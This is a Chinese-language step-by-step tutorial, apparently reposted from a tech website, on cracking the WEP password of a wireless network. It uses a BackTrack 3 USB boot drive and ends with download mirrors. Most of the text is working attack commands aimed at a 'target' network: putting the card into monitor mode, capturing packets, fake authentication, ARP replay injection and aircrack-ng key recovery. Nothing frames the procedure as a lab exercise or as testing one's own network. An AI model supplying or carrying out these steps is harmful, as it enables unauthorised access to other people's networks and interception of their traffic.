backtrack3(BT3) usb版 破解WEP無線網絡密碼詳細步驟（附軟件及中文包下載地址）

backtrack3(BT3) usb版 破解WEP無線網絡密碼詳細步驟（附軟件及中文包下載地址）
本文來源於網絡技術員 http://www.31kxs.cn/ , 原文地址： http://www.31kxs.cn/wuxianwangluo/105/backtrack3BT3usbpojiebuzhou/

1、先開始製做啓動U盤：

將下載好的backtrack3(BT3) usb版(下載地址在文章末尾)文件bt3b141207.rar直接解壓到U盤（1G以上容量）。把Boot 和BT3兩個文件夾放到U盤的根目錄，打開BOOT文件夾雙擊運行" bootinst.bat "批處理文件。U盤裏就會多出4個文件." isolinux.boot" "isolinux.cfg" "isolinux.bin " "syslinux.cfg" （若是想要中文截面的BT3的菜單,就在下載BT3中文語言包。下載地址：http://file.mofile.com/cn/docs/listallfiles.do 提取密碼：4871454552251231。（用的是免費的網絡硬盤,廣告較多,有些朋友可能沒認真看沒找到，我說下大概位置，輸入提取碼後,拉到中間找下面的幾個字(紅色的) 如下這三個連接後兩個都可下載
推薦快車（flashget）高速下載文件 下載文件(IE瀏覽器) 下載文件(非IE瀏覽器)
）把壓縮包裏的"中文包"解壓出來，將裏面的*.lzm文件拷貝到u盤的BT3\modules目錄，便可實現bt3中文化。）
2、以後重啓 windows 進入BIOS設置，把BIOS裏的frist boot device設置爲USB-HDD（或者是USB--ZIP）再重啓選擇從usb啓動。系統進入backtrack3 系統。

3、如今開始破解
1.在shell窗口中輸入 ifconfig 命令 ，出現以下信息：
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:（......）Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
2.找出你的無線網卡名字，我這裏是 eth1.再啓動你的網卡爲Moniter模式(輸入airmon-ng start eth1 11)。再輸入 ifconfig 命令 ，返回以下信息：
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
3. 輸入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.
命令中的11 表示要破解的頻道號，bssid後面的數字表示破解目標的MAC物理地址，outputs表示要生成的包的名稱。回車運行。
4.再開一個 shell 輸入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
其中「targetnet」表示破解目標網絡名,00:1A:01:8D:C3:B2前面已解釋過是指目標MAC物理地址，00:A1:C1:D8:A5:B6表示本機網卡MAC物理地址
5.再開一個 shell 輸入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
獲取更多的數據包。
6.返回數據量到1萬的時候就能夠破解了。再開一個shell輸入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 進行破解。若是破解不成功，讓它繼續抓包，直到破解。

BT3(backtrack3) usb版 下載地址列表
backtrack3(BT3) usb版 下載地址列表：（本身選個快的鏡像下）
BT下載：
Torrent: http://www.remote-exploit.org/bt3b141207.rar.torrent
http://www.offensive-security.com/bt3b141207.rar.torrent
FTP下載：

ftp://ftp.heanet.ie/mirrors/backtrack/bt3b141207.rar
ftp://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.rar
ftp://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.rar
HTTP下載：
http://mirror.switch.ch/ftp/mirror/backtrack/bt3b141207.rar
http://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.rar
http://ftp.heanet.ie/mirrors/backtrack/bt3b141207.rar
http://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.rar
http://ftp.belnet.be/mirror/backtrack/bt3b141207.rar
http://backtrack.mick27.info/bt3b141207.rar